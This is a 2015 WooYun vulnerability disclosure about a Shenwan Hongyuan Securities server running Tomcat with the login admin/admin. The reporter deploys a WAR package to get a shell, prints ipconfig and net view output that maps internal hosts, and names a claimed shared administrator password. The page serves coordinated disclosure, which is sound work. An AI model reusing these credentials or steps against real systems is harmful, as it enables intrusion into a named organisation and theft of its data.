当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101880

漏洞标题:申万宏源证券某站可shell入内网或可导致用户数据库邮件服务器被控制

相关厂商:申万宏源证券

漏洞作者: 杀器王子

提交时间:2015-03-17 14:45

修复时间:2015-05-03 10:04

公开时间:2015-05-03 10:04

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-19: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向核心白帽子及相关领域专家公开
2015-04-08: 细节向普通白帽子公开
2015-04-18: 细节向实习白帽子公开
2015-05-03: 细节向公众公开

简要描述:

申万宏源证券某站可shell入内网或可导致用户数据库邮件服务器被控制

详细说明:

http://file.sywg.com:8888/
tomcat弱口令 admin admin
可以部署war包getshell

Snip20150317_14.png


[*] 基本信息 [ A:C:D:E:Y:Z: ]
D:\Tomcat4.1\bin\..\webapps\test3693\> ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.130.74
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.130.254
D:\Tomcat4.1\webapps\test3693\> net view
服务器名称 注释
-------------------------------------------------------------------------------
\\EHRAPP1WGQ
\\EHRWEB1WGQ
\\EQUIP-APP-CHL
\\FHXFILESVR-CHL
\\FHXHQ-CHL
\\FTP-CHL ftp-chl
\\GG2JIYYB1-CHL
\\GG2JIYYB2-CHL
\\IBD1-CHL IBD1-CHL
\\IBD2-CHL
\\JJR-GAETL-CHL
\\JJR-GAMOBAN-CHL
\\JJR-SEDMAIL-CHL
\\JJR-SENDSMS-CHL
\\JJR-SERVICE-CHL
\\JJR-WBCJ1-CHL
\\JJR-WBCJ2-CHL
\\LENOVO-SYWG
\\MESS-SEND-CHL
\\OA-DOC-CHL
\\OA-WAP-CHL oa-wap-chl
\\QDII-APP-WGQ
\\SJCK-GATEWAY-NE
\\SJCK-WEBNEW-CHL
\\SSO-APP-CHL
\\SW3Q-WDFB-CHL PortaldbServer
\\SWCW-9X
\\SYWG-3D8C73D1A5
\\SYWG-REMEDY2
\\SZTXT-CHL
\\TGAPP-CHL
\\VC-N1-SYWG
\\WEBNEWS01-CHL
\\WEBNEWS02-CHL
\\ZCGLPT-CHL zcglpt-chl
\\ZXAPP-CHL
\\ZXJS-WGQ
\\ZXWEB-CHL
命令成功完成。
D:\Tomcat4.1\webapps\test3693\>

漏洞证明:

分析后得数据库、服务器管理员统一密码 sywg1234
根据tomcat配置 找到大量配置文件
比如

Snip20150317_15.png


Snip20150317_16.png

修复方案:

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-19 10:02

厂商回复:

CNVD确认所述情况,已转由CNCERT向相关部门通报。

最新状态:

暂无